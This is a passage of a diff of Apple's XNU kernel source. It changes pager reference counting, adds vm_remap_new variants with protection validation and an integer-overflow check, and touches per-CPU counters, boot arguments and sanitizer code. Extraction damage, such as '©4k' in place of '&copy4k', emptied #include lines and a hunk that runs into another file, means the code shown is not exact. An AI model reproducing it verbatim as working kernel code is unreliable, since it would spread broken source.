alive */ + assert(os_ref_get_count_raw(&pager->swp_pgr_hdr_ref) > 0); /* pager is alive */ if (pager->is_mapped == FALSE) { /* * First mapping of this pager: take an extra reference @@ -665,7 +670,7 @@ swapfile_pager_map( * are removed. */ pager->is_mapped = TRUE; - pager->ref_count++; + os_ref_retain_locked_raw(&pager->swp_pgr_hdr_ref, NULL); } lck_mtx_unlock(&swapfile_pager_lock); @@ -716,7 +721,7 @@ swapfile_pager_lookup( assert(mem_obj->mo_pager_ops == &swapfile_pager_ops); __IGNORE_WCASTALIGN(pager = (swapfile_pager_t) mem_obj); - assert(pager->ref_count > 0); + assert(os_ref_get_count_raw(&pager->swp_pgr_hdr_ref) > 0); return pager; } @@ -745,7 +750,7 @@ swapfile_pager_create( pager->swp_pgr_hdr.mo_control = MEMORY_OBJECT_CONTROL_NULL; pager->is_ready = FALSE;/* not ready until it has a "name" */ - pager->ref_count = 1; /* setup reference */ + os_ref_init_raw(&pager->swp_pgr_hdr_ref, NULL); /* setup reference */ pager->is_mapped = FALSE; pager->swapfile_vnode = vp; @@ -762,7 +767,7 @@ swapfile_pager_create( if (!queue_end(&swapfile_pager_queue, (queue_entry_t) pager2)) { /* while we hold the lock, transfer our setup ref to winner */ - pager2->ref_count++; + os_ref_retain_locked_raw(&pager2->swp_pgr_hdr_ref, NULL); /* we lost the race, down with the loser... */ lck_mtx_unlock(&swapfile_pager_lock); pager->swapfile_vnode = NULL; @@ -831,7 +836,7 @@ swapfile_pager_setup( pager = SWAPFILE_PAGER_NULL; } else { /* make sure pager doesn't disappear */ - pager->ref_count++; + os_ref_retain_raw(&pager->swp_pgr_hdr_ref, NULL); } lck_mtx_unlock(&swapfile_pager_lock); diff --git a/osfmk/vm/vm_tests.c b/osfmk/vm/vm_tests.c index cda7e0ba1..6e288f8c7 100644 --- a/osfmk/vm/vm_tests.c +++ b/osfmk/vm/vm_tests.c @@ -892,17 +892,19 @@ vm_test_map_copy_adjust_to_target(void) mach_memory_entry_port_release(mem_entry); /* create 4k copy map */ + curprot = VM_PROT_NONE; + maxprot = VM_PROT_NONE; kr = vm_map_copy_extract(map4k, addr4k, 0x3000, - VM_PROT_READ, FALSE, - ©4k, &curprot, &maxprot, + FALSE, ©4k, &curprot, &maxprot, VM_INHERIT_DEFAULT, VM_MAP_KERNEL_FLAGS_NONE); assert(kr == KERN_SUCCESS); assert(copy4k->size == 0x3000); /* create 16k copy map */ + curprot = VM_PROT_NONE; + maxprot = VM_PROT_NONE; kr = vm_map_copy_extract(map16k, addr16k, 0x4000, - VM_PROT_READ, FALSE, - ©16k, &curprot, &maxprot, + FALSE, ©16k, &curprot, &maxprot, VM_INHERIT_DEFAULT, VM_MAP_KERNEL_FLAGS_NONE); assert(kr == KERN_SUCCESS); assert(copy16k->size == 0x4000); diff --git a/osfmk/vm/vm_user.c b/osfmk/vm/vm_user.c index 360289f47..2682dfaaf 100644 --- a/osfmk/vm/vm_user.c +++ b/osfmk/vm/vm_user.c @@ -1184,6 +1184,91 @@ vm_map_kernel( return kr; } +/* + * mach_vm_remap_new - + * Behaves like mach_vm_remap, except that VM_FLAGS_RETURN_DATA_ADDR is always set + * and {cur,max}_protection are in/out. + */ +kern_return_t +mach_vm_remap_new_external( + vm_map_t target_map, + mach_vm_offset_t *address, + mach_vm_size_t size, + mach_vm_offset_t mask, + int flags, + mach_port_t src_tport, + mach_vm_offset_t memory_address, + boolean_t copy, + vm_prot_t *cur_protection, /* IN/OUT */ + vm_prot_t *max_protection, /* IN/OUT */ + vm_inherit_t inheritance) +{ + vm_tag_t tag; + vm_map_offset_t map_addr; + kern_return_t kr; + vm_map_t src_map; + + flags |= VM_FLAGS_RETURN_DATA_ADDR; + VM_GET_FLAGS_ALIAS(flags, tag); + + /* filter out any kernel-only flags */ + if (flags & ~VM_FLAGS_USER_REMAP) { + return KERN_INVALID_ARGUMENT; + } + + if (target_map == VM_MAP_NULL) { + return KERN_INVALID_ARGUMENT; + } + + if ((*cur_protection & ~VM_PROT_ALL) || + (*max_protection & ~VM_PROT_ALL) || + (*cur_protection & *max_protection) != *cur_protection) { + return KERN_INVALID_ARGUMENT; + } + if ((*max_protection & (VM_PROT_WRITE | VM_PROT_EXECUTE)) == + (VM_PROT_WRITE | VM_PROT_EXECUTE)) { + /* + * XXX FBDP TODO + * enforce target's "wx" policies + */ + return KERN_PROTECTION_FAILURE; + } + + if (copy || *max_protection == VM_PROT_READ || *max_protection == VM_PROT_NONE) { + src_map = convert_port_to_map_read(src_tport); + } else { + src_map = convert_port_to_map(src_tport); + } + + if (src_map == VM_MAP_NULL) { + return KERN_INVALID_ARGUMENT; + } + + map_addr = (vm_map_offset_t)*address; + + kr = vm_map_remap(target_map, + &map_addr, + size, + mask, + flags, + VM_MAP_KERNEL_FLAGS_NONE, + tag, + src_map, + memory_address, + copy, + cur_protection, /* IN/OUT */ + max_protection, /* IN/OUT */ + inheritance); + + *address = map_addr; + vm_map_deallocate(src_map); + + if (kr == KERN_SUCCESS) { + ipc_port_release_send(src_tport); /* consume on success */ + } + return kr; +} + /* * mach_vm_remap - * Remap a range of memory from one task into another, @@ -1201,8 +1286,8 @@ mach_vm_remap_external( vm_map_t src_map, mach_vm_offset_t memory_address, boolean_t copy, - vm_prot_t *cur_protection, - vm_prot_t *max_protection, + vm_prot_t *cur_protection, /* OUT */ + vm_prot_t *max_protection, /* OUT */ vm_inherit_t inheritance) { vm_tag_t tag; @@ -1223,8 +1308,8 @@ mach_vm_remap_kernel( vm_map_t src_map, mach_vm_offset_t memory_address, boolean_t copy, - vm_prot_t *cur_protection, - vm_prot_t *max_protection, + vm_prot_t *cur_protection, /* OUT */ + vm_prot_t *max_protection, /* OUT */ vm_inherit_t inheritance) { vm_map_offset_t map_addr; @@ -1241,6 +1326,9 @@ mach_vm_remap_kernel( map_addr = (vm_map_offset_t)*address; + *cur_protection = VM_PROT_NONE; + *max_protection = VM_PROT_NONE; + kr = vm_map_remap(target_map, &map_addr, size, @@ -1251,13 +1339,98 @@ mach_vm_remap_kernel( src_map, memory_address, copy, - cur_protection, - max_protection, + cur_protection, /* IN/OUT */ + max_protection, /* IN/OUT */ inheritance); *address = map_addr; return kr; } +/* + * vm_remap_new - + * Behaves like vm_remap, except that VM_FLAGS_RETURN_DATA_ADDR is always set + * and {cur,max}_protection are in/out. + */ +kern_return_t +vm_remap_new_external( + vm_map_t target_map, + vm_offset_t *address, + vm_size_t size, + vm_offset_t mask, + int flags, + mach_port_t src_tport, + vm_offset_t memory_address, + boolean_t copy, + vm_prot_t *cur_protection, /* IN/OUT */ + vm_prot_t *max_protection, /* IN/OUT */ + vm_inherit_t inheritance) +{ + vm_tag_t tag; + vm_map_offset_t map_addr; + kern_return_t kr; + vm_map_t src_map; + + flags |= VM_FLAGS_RETURN_DATA_ADDR; + VM_GET_FLAGS_ALIAS(flags, tag); + + /* filter out any kernel-only flags */ + if (flags & ~VM_FLAGS_USER_REMAP) { + return KERN_INVALID_ARGUMENT; + } + + if (target_map == VM_MAP_NULL) { + return KERN_INVALID_ARGUMENT; + } + + if ((*cur_protection & ~VM_PROT_ALL) || + (*max_protection & ~VM_PROT_ALL) || + (*cur_protection & *max_protection) != *cur_protection) { + return KERN_INVALID_ARGUMENT; + } + if ((*max_protection & (VM_PROT_WRITE | VM_PROT_EXECUTE)) == + (VM_PROT_WRITE | VM_PROT_EXECUTE)) { + /* + * XXX FBDP TODO + * enforce target's "wx" policies + */ + return KERN_PROTECTION_FAILURE; + } + + if (copy || *max_protection == VM_PROT_READ || *max_protection == VM_PROT_NONE) { + src_map = convert_port_to_map_read(src_tport); + } else { + src_map = convert_port_to_map(src_tport); + } + + if (src_map == VM_MAP_NULL) { + return KERN_INVALID_ARGUMENT; + } + + map_addr = (vm_map_offset_t)*address; + + kr = vm_map_remap(target_map, + &map_addr, + size, + mask, + flags, + VM_MAP_KERNEL_FLAGS_NONE, + tag, + src_map, + memory_address, + copy, + cur_protection, /* IN/OUT */ + max_protection, /* IN/OUT */ + inheritance); + + *address = CAST_DOWN(vm_offset_t, map_addr); + vm_map_deallocate(src_map); + + if (kr == KERN_SUCCESS) { + ipc_port_release_send(src_tport); /* consume on success */ + } + return kr; +} + /* * vm_remap - * Remap a range of memory from one task into another, @@ -1279,8 +1452,8 @@ vm_remap_external( vm_map_t src_map, vm_offset_t memory_address, boolean_t copy, - vm_prot_t *cur_protection, - vm_prot_t *max_protection, + vm_prot_t *cur_protection, /* OUT */ + vm_prot_t *max_protection, /* OUT */ vm_inherit_t inheritance) { vm_tag_t tag; @@ -1301,8 +1474,8 @@ vm_remap_kernel( vm_map_t src_map, vm_offset_t memory_address, boolean_t copy, - vm_prot_t *cur_protection, - vm_prot_t *max_protection, + vm_prot_t *cur_protection, /* OUT */ + vm_prot_t *max_protection, /* OUT */ vm_inherit_t inheritance) { vm_map_offset_t map_addr; @@ -1319,6 +1492,9 @@ vm_remap_kernel( map_addr = (vm_map_offset_t)*address; + *cur_protection = VM_PROT_NONE; + *max_protection = VM_PROT_NONE; + kr = vm_map_remap(target_map, &map_addr, size, @@ -1329,8 +1505,8 @@ vm_remap_kernel( src_map, memory_address, copy, - cur_protection, - max_protection, + cur_protection, /* IN/OUT */ + max_protection, /* IN/OUT */ inheritance); *address = CAST_DOWN(vm_offset_t, map_addr); return kr; @@ -1375,8 +1551,6 @@ mach_vm_wire_kernel( return KERN_INVALID_HOST; } - assert(host_priv == &realhost); - if (map == VM_MAP_NULL) { return KERN_INVALID_TASK; } @@ -1426,8 +1600,6 @@ vm_wire( return KERN_INVALID_HOST; } - assert(host_priv == &realhost); - if (map == VM_MAP_NULL) { return KERN_INVALID_TASK; } @@ -2099,7 +2271,10 @@ mach_vm_page_range_query( effective_page_size = (1 << effective_page_shift); effective_page_mask = effective_page_size - 1; - disp_buf_req_size = (*dispositions_count * sizeof(int)); + if (os_mul_overflow(*dispositions_count, sizeof(int), &disp_buf_req_size)) { + return KERN_INVALID_ARGUMENT; + } + start = vm_map_trunc_page(address, effective_page_mask); end = vm_map_round_page(address + size, effective_page_mask); @@ -2296,7 +2471,7 @@ kern_return_t mach_make_memory_entry_64( vm_map_t target_map, memory_object_size_t *size, - memory_object_offset_t offset, + memory_object_offset_t offset, vm_prot_t permission, ipc_port_t *object_handle, ipc_port_t parent_handle) @@ -2674,7 +2849,6 @@ mach_make_memory_entry_internal( vm_prot_t cur_prot, max_prot; vm_map_kernel_flags_t vmk_flags; vm_map_entry_t parent_copy_entry; - vm_prot_t required_protection; if (target_map == VM_MAP_NULL) { DEBUG4K_MEMENTRY("map %p offset 0x%llx size 0x%llx prot 0x%x -> entry %p kr 0x%x\n", target_map, offset, *size, permission, user_entry, KERN_INVALID_TASK); @@ -2685,6 +2859,42 @@ mach_make_memory_entry_internal( vmk_flags = VM_MAP_KERNEL_FLAGS_NONE; parent_copy_entry = VM_MAP_ENTRY_NULL; if (!(permission & MAP_MEM_VM_SHARE)) { + vm_map_t tmp_map, real_map; + vm_map_version_t version; + vm_object_t tmp_object; + vm_object_offset_t obj_off; + vm_prot_t prot; + boolean_t wired; + bool contended; + + /* resolve any pending submap copy-on-write... */ + if (protections & VM_PROT_WRITE) { + tmp_map = target_map; + vm_map_lock_read(tmp_map); + kr = vm_map_lookup_locked(&tmp_map, + map_start, + protections | mask_protections, + OBJECT_LOCK_EXCLUSIVE, + &version, + &tmp_object, + &obj_off, + &prot, + &wired, + NULL, /* fault_info */ + &real_map, + &contended); + if (kr != KERN_SUCCESS) { + vm_map_unlock_read(tmp_map); + } else { + vm_object_unlock(tmp_object); + vm_map_unlock_read(tmp_map); + if (real_map != tmp_map) { + vm_map_unlock_read(real_map); + } + } + } + /* ... and carry on */ + /* stop extracting if VM object changes */ vmk_flags.vmkf_copy_single_object = TRUE; if ((permission & MAP_MEM_NAMED_REUSE) && @@ -2718,15 +2928,16 @@ mach_make_memory_entry_internal( * caller is asking for whichever proctections are * available: no required protections. */ - required_protection = VM_PROT_NONE; + cur_prot = VM_PROT_NONE; + max_prot = VM_PROT_NONE; } else { /* * Caller wants a memory entry with "protections". * Make sure we extract only memory that matches that. */ - required_protection = protections; + cur_prot = protections; + max_prot = protections; } - cur_prot = VM_PROT_ALL; if (target_map->pmap == kernel_pmap) { /* * Get "reserved" map entries to avoid deadlocking @@ -2743,7 +2954,6 @@ mach_make_memory_entry_internal( kr = vm_map_copy_extract(target_map, map_start, map_size, - required_protection, FALSE, /* copy */ ©, &cur_prot, @@ -2758,7 +2968,6 @@ mach_make_memory_entry_internal( return kr; } assert(copy != VM_MAP_COPY_NULL); - assert((cur_prot & required_protection) == required_protection); if (mask_protections) { /* @@ -2780,6 +2989,9 @@ mach_make_memory_entry_internal( * We want exactly "original_protections" * out of "cur_prot". */ + assert((cur_prot & protections) == protections); + assert((max_prot & protections) == protections); + /* XXX FBDP TODO: no longer needed? */ if ((cur_prot & protections) != protections) { if (VM_MAP_PAGE_SHIFT(target_map) < PAGE_SHIFT) { // panic("DEBUG4K %s:%d kr 0x%x\n", __FUNCTION__, __LINE__, KERN_PROTECTION_FAILURE); @@ -2948,10 +3160,8 @@ mach_make_memory_entry_internal( if (parent_entry->is_sub_map) { vm_map_t map = parent_entry->backing.map; + vm_map_reference(map); user_entry->backing.map = map; - lck_mtx_lock(&map->s_lock); - os_ref_retain_locked(&map->map_refcnt); - lck_mtx_unlock(&map->s_lock); } else { object = vm_named_entry_to_vm_object(parent_entry); assert(object != VM_OBJECT_NULL); @@ -3516,7 +3726,7 @@ mach_memory_entry_phys_page_offset( return KERN_INVALID_ARGUMENT; } - mem_entry = (vm_named_entry_t) entry_port->ip_kobject; + mem_entry = (vm_named_entry_t) ipc_kobject_get(entry_port); named_entry_lock(mem_entry); @@ -3562,7 +3772,7 @@ mach_memory_entry_map_size( return KERN_INVALID_ARGUMENT; } - mem_entry = (vm_named_entry_t) entry_port->ip_kobject; + mem_entry = (vm_named_entry_t) ipc_kobject_get(entry_port); named_entry_lock(mem_entry); if (mem_entry->is_sub_map) { @@ -4234,8 +4444,8 @@ mach_vm_remap( vm_map_t src_map, mach_vm_offset_t memory_address, boolean_t copy, - vm_prot_t *cur_protection, - vm_prot_t *max_protection, + vm_prot_t *cur_protection, /* OUT */ + vm_prot_t *max_protection, /* OUT */ vm_inherit_t inheritance) { return mach_vm_remap_external(target_map, address, size, mask, flags, src_map, memory_address, diff --git a/osfmk/x86_64/copyio.c b/osfmk/x86_64/copyio.c index 9569ed36c..c262c4067 100644 --- a/osfmk/x86_64/copyio.c +++ b/osfmk/x86_64/copyio.c @@ -206,7 +206,7 @@ copyio(int copy_type, user_addr_t user_addr, char *kernel_addr, * Size of elements in the permanent zone is not saved as a part of the * zone's info */ - if (__improbable(src_zone && !src_zone->permanent && + if (__improbable(src_zone && !src_zone->z_permanent && kernel_buf_size < nbytes)) { panic("copyio: kernel buffer %p has size %lu < nbytes %lu", kernel_addr, kernel_buf_size, nbytes); } diff --git a/osfmk/x86_64/counter.c b/osfmk/x86_64/counter.c new file mode 100644 index 000000000..421102406 --- /dev/null +++ b/osfmk/x86_64/counter.c @@ -0,0 +1,109 @@ +/* * Copyright (c) 2020 Apple Inc. All rights reserved. + * + * @APPLE_OSREFERENCE_LICENSE_HEADER_START@ + * + * This file contains Original Code and/or Modifications of Original Code + * as defined in and that are subject to the Apple Public Source License + * Version 2.0 (the 'License'). You may not use this file except in + * compliance with the License. The rights granted to you under the License + * may not be used to create, or enable the creation or redistribution of, + * unlawful or unlicensed copies of an Apple operating system, or to + * circumvent, violate, or enable the circumvention or violation of, any + * terms of an Apple operating system software license agreement. + * + * Please obtain a copy of the License at + * http://www.opensource.apple.com/apsl/ and read it before using this file. + * + * The Original Code and all software distributed under the License are + * distributed on an 'AS IS' basis, WITHOUT WARRANTY OF ANY KIND, EITHER + * EXPRESS OR IMPLIED, AND APPLE HEREBY DISCLAIMS ALL SUCH WARRANTIES, + * INCLUDING WITHOUT LIMITATION, ANY WARRANTIES OF MERCHANTABILITY, + * FITNESS FOR A PARTICULAR PURPOSE, QUIET ENJOYMENT OR NON-INFRINGEMENT. + * Please see the License for the specific language governing rights and + * limitations under the License. + * + * @APPLE_OSREFERENCE_LICENSE_HEADER_END@ + */ +/* + * @OSF_COPYRIGHT@ + */ +/* + * Mach Operating System + * Copyright (c) 1991,1990,1989,1988,1987 Carnegie Mellon University + * All Rights Reserved. + * + * Permission to use, copy, modify and distribute this software and its + * documentation is hereby granted, provided that both the copyright + * notice and this permission notice appear in all copies of the + * software, derivative works or modified versions, and any portions + * thereof, and that both notices appear in supporting documentation. + * + * CARNEGIE MELLON ALLOWS FREE USE OF THIS SOFTWARE IN ITS "AS IS" + * CONDITION. CARNEGIE MELLON DISCLAIMS ANY LIABILITY OF ANY KIND FOR + * ANY DAMAGES WHATSOEVER RESULTING FROM THE USE OF THIS SOFTWARE. + * + * Carnegie Mellon requests users of this software to return to + * + * Software Distribution Coordinator or Software.Distribution@CS.CMU.EDU + * School of Computer Science + * Carnegie Mellon University + * Pittsburgh PA 15213-3890 + * + * any improvements or extensions that they make and grant Carnegie Mellon + * the rights to redistribute these changes. + */ +#include +#include +#include +#include +#include +#include +#include + +OS_OVERLOADABLE +void +counter_add(scalable_counter_t *counter, uint64_t amount) +{ + disable_preemption(); + (*zpercpu_get(*counter)) += amount; + enable_preemption(); +} + +OS_OVERLOADABLE +void +counter_inc(scalable_counter_t *counter) +{ + disable_preemption(); + (*zpercpu_get(*counter))++; + enable_preemption(); +} + +OS_OVERLOADABLE +void +counter_dec(scalable_counter_t *counter) +{ + disable_preemption(); + (*zpercpu_get(*counter))--; + enable_preemption(); +} + +OS_OVERLOADABLE +void +counter_add_preemption_disabled(scalable_counter_t *counter, uint64_t amount) +{ + (*zpercpu_get(*counter)) += amount; +} + +OS_OVERLOADABLE +void +counter_inc_preemption_disabled(scalable_counter_t *counter) +{ + (*zpercpu_get(*counter))++; +} + +OS_OVERLOADABLE +void +counter_dec_preemption_disabled(scalable_counter_t *counter) +{ + (*zpercpu_get(*counter))--; +} diff --git a/osfmk/x86_64/pmap.c b/osfmk/x86_64/pmap.c index 79ad35a0e..aa370791b 100644 --- a/osfmk/x86_64/pmap.c +++ b/osfmk/x86_64/pmap.c @@ -3275,6 +3275,41 @@ pmap_lookup_in_static_trust_cache(const uint8_t __unused cdhash[20]) return false; } +SIMPLE_LOCK_DECLARE(pmap_compilation_service_cdhash_lock, 0); +uint8_t pmap_compilation_service_cdhash[CS_CDHASH_LEN] = { 0 }; + +void +pmap_set_compilation_service_cdhash(const uint8_t cdhash[CS_CDHASH_LEN]) +{ + simple_lock(&pmap_compilation_service_cdhash_lock, LCK_GRP_NULL); + memcpy(pmap_compilation_service_cdhash, cdhash, CS_CDHASH_LEN); + simple_unlock(&pmap_compilation_service_cdhash_lock); + +#if DEVELOPMENT || DEBUG + printf("Added Compilation Service CDHash through the PMAP: 0x%02X 0x%02X 0x%02X 0x%02X\n", cdhash[0], cdhash[1], cdhash[2], cdhash[4]); +#endif +} + +bool +pmap_match_compilation_service_cdhash(const uint8_t cdhash[CS_CDHASH_LEN]) +{ + bool match = false; + + simple_lock(&pmap_compilation_service_cdhash_lock, LCK_GRP_NULL); + if (bcmp(pmap_compilation_service_cdhash, cdhash, CS_CDHASH_LEN) == 0) { + match = true; + } + simple_unlock(&pmap_compilation_service_cdhash_lock); + +#if DEVELOPMENT || DEBUG + if (match) { + printf("Matched Compilation Service CDHash through the PMAP\n"); + } +#endif + + return match; +} + bool pmap_in_ppl(void) { @@ -3307,3 +3342,26 @@ pmap_free_reserved_ppl_page(void __unused *kva) { // Unsupported on this architecture. } + +#if DEVELOPMENT || DEBUG +/* + * Used for unit testing recovery from text corruptions. + */ +kern_return_t +pmap_test_text_corruption(pmap_paddr_t pa) +{ + int pai; + uint8_t *va; + + pai = ppn_to_pai(atop(pa)); + if (!IS_MANAGED_PAGE(pai)) { + return KERN_FAILURE; + } + + va = (uint8_t *)PHYSMAP_PTOV(pa); + va[0] = 0x0f; /* opcode for UD2 */ + va[1] = 0x0b; + + return KERN_SUCCESS; +} +#endif /* DEVELOPMENT || DEBUG */ diff --git a/pexpert/arm/pe_identify_machine.c b/pexpert/arm/pe_identify_machine.c index 1ddd6fc65..b3b867632 100644 --- a/pexpert/arm/pe_identify_machine.c +++ b/pexpert/arm/pe_identify_machine.c @@ -407,7 +407,7 @@ pe_run_debug_command(command_buffer_element_t *command_buffer) nanoseconds_to_absolutetime(command_buffer->delay_us * NSEC_PER_USEC, &deadline); deadline += ml_get_timebase(); while (ml_get_timebase() < deadline) { - ; + os_compiler_barrier(); } } } diff --git a/pexpert/arm/pe_init.c b/pexpert/arm/pe_init.c index 8ff54da6c..2934d4da8 100644 --- a/pexpert/arm/pe_init.c +++ b/pexpert/arm/pe_init.c @@ -394,7 +394,10 @@ PE_init_platform(boolean_t vm_initialized, void *args) PE_state.video.v_width = boot_args_ptr->Video.v_width; PE_state.video.v_height = boot_args_ptr->Video.v_height; PE_state.video.v_depth = (boot_args_ptr->Video.v_depth >> kBootVideoDepthDepthShift) & kBootVideoDepthMask; - PE_state.video.v_rotate = (boot_args_ptr->Video.v_depth >> kBootVideoDepthRotateShift) & kBootVideoDepthMask; + PE_state.video.v_rotate = ( + ((boot_args_ptr->Video.v_depth >> kBootVideoDepthRotateShift) & kBootVideoDepthMask) + // rotation + ((boot_args_ptr->Video.v_depth >> kBootVideoDepthBootRotateShift) & kBootVideoDepthMask) // add extra boot rotation + ) % 4; PE_state.video.v_scale = ((boot_args_ptr->Video.v_depth >> kBootVideoDepthScaleShift) & kBootVideoDepthMask) + 1; PE_state.video.v_display = boot_args_ptr->Video.v_display; strlcpy(PE_state.video.v_pixelFormat, "BBBBBBBBGGGGGGGGRRRRRRRR", sizeof(PE_state.video.v_pixelFormat)); diff --git a/pexpert/arm/pe_serial.c b/pexpert/arm/pe_serial.c index b555aa1e2..cf8dab9fb 100644 --- a/pexpert/arm/pe_serial.c +++ b/pexpert/arm/pe_serial.c @@ -629,8 +629,8 @@ SECURITY_READ_ONLY_LATE(static struct pe_serial_functions) dockchannel_uart_seri /****************************************************************************/ #ifdef PI3_UART -vm_offset_t pi3_gpio_base_vaddr = 0; -vm_offset_t pi3_aux_base_vaddr = 0; +static vm_offset_t pi3_gpio_base_vaddr = 0; +static vm_offset_t pi3_aux_base_vaddr = 0; static int pi3_uart_tr0(void) { @@ -716,6 +716,10 @@ SECURITY_READ_ONLY_LATE(static struct pe_serial_functions) pi3_uart_serial_funct }; #endif /* PI3_UART */ + +/*****************************************************************************/ + + /*****************************************************************************/ static void @@ -778,6 +782,7 @@ serial_init(void) } #endif /* PI3_UART */ + #ifdef DOCKCHANNEL_UART uint32_t no_dockchannel_uart = 0; if (SecureDTFindEntry("name", "dockchannel-uart", &entryP) == kSuccess) { diff --git a/pexpert/pexpert/arm/boot.h b/pexpert/pexpert/arm/boot.h index 9a9c31361..f5a82bb19 100644 --- a/pexpert/pexpert/arm/boot.h +++ b/pexpert/pexpert/arm/boot.h @@ -30,6 +30,7 @@ struct Boot_Video { #define kBootVideoDepthDepthShift (0) #define kBootVideoDepthRotateShift (8) #define kBootVideoDepthScaleShift (16) +#define kBootVideoDepthBootRotateShift (24) #define kBootFlagsDarkBoot (1 << 0) diff --git a/pexpert/pexpert/arm64/apple_arm64_regs.h b/pexpert/pexpert/arm64/apple_arm64_regs.h index 270255667..ade05dc8e 100644 --- a/pexpert/pexpert/arm64/apple_arm64_regs.h +++ b/pexpert/pexpert/arm64/apple_arm64_regs.h @@ -14,7 +14,6 @@ #ifdef APPLE_ARM64_ARCH_FAMILY -#define ARM64_REG_HID0 S3_0_c15_c0_0 #define ARM64_REG_HID0_LoopBuffDisb (1<<20) #define ARM64_REG_HID0_AMXCacheFusionDisb (1ULL<<21) #define ARM64_REG_HID0_ICPrefLimitOneBrn (1<<25) @@ -26,10 +25,8 @@ #define ARM64_REG_HID0_ICPrefDepth_bmsk (7ULL < #include +#undef HAS_SIQ #define MAX_L2_CLINE 7 #define MAX_CPUS 8 @@ -235,6 +230,7 @@ #define CORE_NCTRS 8 /* Placeholder; KPC is not enabled for this target */ #endif /* ARM64_BOARD_CONFIG_BCM2837 */ + #ifndef HAS_UNCORE_CTRS #undef UNCORE_VERSION #undef UNCORE_PER_CLUSTER diff --git a/pexpert/pexpert/arm64/boot.h b/pexpert/pexpert/arm64/boot.h index 1bcf4990e..f43d16e4b 100644 --- a/pexpert/pexpert/arm64/boot.h +++ b/pexpert/pexpert/arm64/boot.h @@ -42,6 +42,7 @@ struct Boot_Video { #define kBootVideoDepthDepthShift (0) #define kBootVideoDepthRotateShift (8) #define kBootVideoDepthScaleShift (16) +#define kBootVideoDepthBootRotateShift (24) #define kBootFlagsDarkBoot (1ULL << 0) diff --git a/pexpert/pexpert/i386/boot.h b/pexpert/pexpert/i386/boot.h index de2f95e8d..7486640e7 100644 --- a/pexpert/pexpert/i386/boot.h +++ b/pexpert/pexpert/i386/boot.h @@ -202,14 +202,20 @@ typedef struct boot_args { /* Version 2, Revision 1 */ uint64_t KC_hdrs_vaddr; - uint64_t arvRootHashStart; /* Physical address of root hash file */ + uint64_t arvRootHashStart; /* Physical address of system volume root hash file */ uint64_t arvRootHashSize; - uint64_t arvManifestStart; /* Physical address of manifest file */ + uint64_t arvManifestStart; /* Physical address of system volume manifest file */ uint64_t arvManifestSize; + uint64_t bsARVRootHashStart;/* Physical address of base system root hash file */ + uint64_t bsARVRootHashSize; + + uint64_t bsARVManifestStart;/* Physical address of base system manifest file */ + uint64_t bsARVManifestSize; + /* Reserved */ - uint32_t __reserved4[700]; + uint32_t __reserved4[692]; } boot_args; extern char assert_boot_args_size_is_4096[sizeof(boot_args) == 4096 ? 1 : -1]; diff --git a/san/Kasan_kasan.exports b/san/Kasan_kasan.exports index 72f916f33..4f0c5a53f 100644 --- a/san/Kasan_kasan.exports +++ b/san/Kasan_kasan.exports @@ -139,12 +139,12 @@ ___ubsan_handle_negate_overflow ___ubsan_handle_negate_overflow_abort ___ubsan_handle_nonnull_arg ___ubsan_handle_nonnull_arg_abort -___ubsan_handle_nonnull_return -___ubsan_handle_nonnull_return_abort +___ubsan_handle_nonnull_return_v1 +___ubsan_handle_nonnull_return_v1_abort ___ubsan_handle_nullability_arg ___ubsan_handle_nullability_arg_abort -___ubsan_handle_nullability_return -___ubsan_handle_nullability_return_abort +___ubsan_handle_nullability_return_v1 +___ubsan_handle_nullability_return_v1_abort ___ubsan_handle_out_of_bounds ___ubsan_handle_out_of_bounds_abort ___ubsan_handle_pointer_overflow diff --git a/san/kasan-blacklist b/san/kasan-blacklist index 00c42c778..9d7a97047 100644 --- a/san/kasan-blacklist +++ b/san/kasan-blacklist @@ -46,5 +46,4 @@ fun:_ZL18IOTrackingLeakScanPv # Exclude KASAN dependencies # XXX: could this be relaxed since fakestack is reentrant? src:./osfmk/kern/zalloc.c -src:./osfmk/kern/zcache.c diff --git a/san/kasan-fakestack.c b/san/kasan-fakestack.c index 9f45135d6..b865b7ff2 100644 --- a/san/kasan-fakestack.c +++ b/san/kasan-fakestack.c @@ -282,11 +282,12 @@ kasan_init_fakestack(void) snprintf(fakestack_names[i], 16, "fakestack.%d", i); fakestack_zones[i] = zone_create_ext(fakestack_names[i], sz, - ZC_NOCALLOUT | ZC_NOGC | ZC_KASAN_NOREDZONE | ZC_KASAN_NOQUARANTINE, + ZC_NOCALLOUT | ZC_NOGC | ZC_NOCACHING | + ZC_KASAN_NOREDZONE | ZC_KASAN_NOQUARANTINE, ZONE_ID_ANY, ^(zone_t z) { - zone_set_exhaustible(z, maxsz); + zone_set_exhaustible(z, maxsz / sz); }); - zfill(fakestack_zones[i], (int)maxsz / sz); + zone_fill_initially(fakestack_zones[i], maxsz / sz); } /* globally enable */ diff --git a/san/ksancov.c b/san/ksancov.c index 762d69da8..975a5fc2c 100644 --- a/san/ksancov.c +++ b/san/ksancov.c @@ -106,7 +106,7 @@ static uint32_t __unused npcs = 0; static _Atomic unsigned active_devs; static LCK_GRP_DECLARE(ksancov_lck_grp, "ksancov_lck_grp"); -static lck_rw_t *ksancov_devs_lck; +static LCK_RW_DECLARE(ksancov_devs_lck, &ksancov_lck_grp); /* array of devices indexed by devnode minor */ static ksancov_dev_t ksancov_devs[KSANCOV_MAX_DEV]; @@ -386,21 +386,21 @@ ksancov_open(dev_t dev, int flags, int devtype, proc_t p) return EBUSY; } - lck_rw_lock_exclusive(ksancov_devs_lck); + lck_rw_lock_exclusive(&ksancov_devs_lck); if (ksancov_devs[minor_num]) { - lck_rw_unlock_exclusive(ksancov_devs_lck); + lck_rw_unlock_exclusive(&ksancov_devs_lck); return EBUSY; } ksancov_dev_t d = create_dev(dev); if (!d) { - lck_rw_unlock_exclusive(ksancov_devs_lck); + lck_rw_unlock_exclusive(&ksancov_devs_lck); return ENOMEM; } ksancov_devs[minor_num] = d; - lck_rw_unlock_exclusive(ksancov_devs_lck); + lck_rw_unlock_exclusive(&ksancov_devs_lck); return 0; } @@ -531,6 +531,9 @@ ksancov_detach(ksancov_dev_t d) thread_wait(d->thread, TRUE); } + assert(active_devs >= 1); + os_atomic_sub(&active_devs, 1, relaxed); + /* drop our thread reference */ thread_deallocate(d->thread); d->thread = THREAD_NULL; @@ -542,10 +545,10 @@ ksancov_close(dev_t dev, int flags, int devtype, proc_t p) #pragma unused(flags,devtype,p) const int minor_num = minor(dev); - lck_rw_lock_exclusive(ksancov_devs_lck); + lck_rw_lock_exclusive(&ksancov_devs_lck); ksancov_dev_t d = ksancov_devs[minor_num]; ksancov_devs[minor_num] = NULL; /* dev no longer discoverable */ - lck_rw_unlock_exclusive(ksancov_devs_lck); + 